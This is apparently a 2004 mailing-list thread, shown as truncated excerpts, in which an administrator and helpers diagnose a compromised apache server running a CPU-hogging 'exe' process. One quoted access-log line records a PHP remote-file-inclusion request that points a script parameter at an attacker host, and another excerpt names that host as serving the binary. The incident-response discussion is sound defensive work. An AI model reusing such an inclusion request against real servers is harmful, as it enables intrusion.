Re: apache / exe process taking 99 % cpu

2004-09-14 Thread Timo Veith
On Monday, 13 September 2004 14:07, [EMAIL PROTECTED] wrote:
> I tried to download file at 142.176.141.5/tmp ("exe" file itself), but
> it says 404 not found. There are several IP addresses, so maybe someone
> will have better luck.

We have managed to catch the uploaded binary. After decompressin

Re: Re: apache / exe process taking 99 % cpu

2004-09-13 Thread lami
I also googled after the ip address of that remote box to which the alleged apache proc had a connection and found these links: http://www.linux.org.ru/view-message.jsp?msgid=632105&back=view-group.jsp%3Fgroup%3D7300

Re: apache / exe process taking 99 % cpu

2004-09-02 Thread Timo Veith
On Wednesday, 1 September 2004 14:24, Marcin Owsiany wrote:
> Check whether the index.php looks like something that was created by
> the attacker, or it is just a legitimate but buggy script file.

It is a normal index.php file from a legitimate user. It seems to be programmed poorly, because it

Re: apache / exe process taking 99 % cpu

2004-09-01 Thread Marcin Owsiany
On Wed, Sep 01, 2004 at 02:30:49AM +0200, Timo Veith wrote:
> apache access.log:
> 142.176.141.5 - - [29/Aug/2004:21:51:47 +0200]
> "GET /path/to/index.php?p=http://142.176.141.5:113/ HTTP/1.1" 200 2979
> "-" "curl/7.10.3 (i686-pc-linux-gnu) libcurl/7.10.3 OpenSSL/0.9.7a
> zlib/1.1.4"
>
> The p

Re: apache / exe process taking 99 % cpu

2004-08-31 Thread Timo Veith
On Wednesday, 1 September 2004 01:32, Marcin Owsiany wrote:
> A DoS does not necessarily mean a lot of traffic byte-wise. Remember
> that it only takes 2 packets sent and one received to initiate a TCP
> connection. And creating a huge number of connections certainly can be
> considered a DoS.

Yo

Re: apache / exe process taking 99 % cpu

2004-08-31 Thread Marcin Owsiany
On Wed, Sep 01, 2004 at 12:25:19AM +0200, Timo Veith wrote:
> On Tuesday 31 August 2004 03:24, Marcin Owsiany wrote:
> > On Tue, Aug 31, 2004 at 12:59:48AM +0200, Timo Veith wrote:
> > > On Monday 30 August 2004 21:06, Marcin Owsiany wrote:
> > > I added an iptables rule to the OUTPUT chain dropping

Re: apache / exe process taking 99 % cpu

2004-08-31 Thread Steve Kemp
On Wed, Sep 01, 2004 at 12:25:19AM +0200, Timo Veith wrote:
>
> It seems to be a php issue. I
> searched through all php files that "include" or "fopen" something ...
> whew there are way too many.
>
> Any ideas?

If you have pristine logfiles for apache you might want to look for suspicious

Re: apache / exe process taking 99 % cpu

2004-08-31 Thread Timo Veith
On Tuesday 31 August 2004 03:24, Marcin Owsiany wrote:
> On Tue, Aug 31, 2004 at 12:59:48AM +0200, Timo Veith wrote:
> > On Monday 30 August 2004 21:06, Marcin Owsiany wrote:
> > I added an iptables rule to the OUTPUT chain dropping all tcp packets to
> > that box:port and guess what? My server was

Re: apache / exe process taking 99 % cpu

2004-08-30 Thread Marcin Owsiany
On Tue, Aug 31, 2004 at 12:59:48AM +0200, Timo Veith wrote:
> On Monday 30 August 2004 21:06, Marcin Owsiany wrote:
> I added an iptables rule to the OUTPUT chain dropping all tcp packets to that
> box:port and guess what? My server was back idle again. No more 99 % cpu
> usage and the process now

Re: apache / exe process taking 99 % cpu

2004-08-30 Thread Timo Veith
Hello Marcin, thank you for your reply.

On Monday 30 August 2004 21:06, Marcin Owsiany wrote:
> On Mon, Aug 30, 2004 at 03:50:35PM +0200, Timo Veith wrote:
> > My question is, have I been hacked?
>
> Probably. Do you run PHP? Buggy PHP scripts are a common attack vector
> these days.

Yes, we do

Re: apache / exe process taking 99 % cpu

2004-08-30 Thread Marcin Owsiany
On Mon, Aug 30, 2004 at 03:50:35PM +0200, Timo Veith wrote:
> My question is, have I been hacked?

Probably. Do you run PHP? Buggy PHP scripts are a common attack vector these days.

> Could that be a CGI program gone wild?

Yes, if the "pid changes" you noted are just independent processes. Less

apache / exe process taking 99 % cpu

2004-08-30 Thread Timo Veith
Hi list, I have an apache process which takes 99 % cpu. It's not common that an apache proc takes that much cpu on this system. I noticed it on my rrd load and cpu usage graph. It's on since yesterday about 22:00. top also lists the process with a name of "exe". Running under the user id of www-d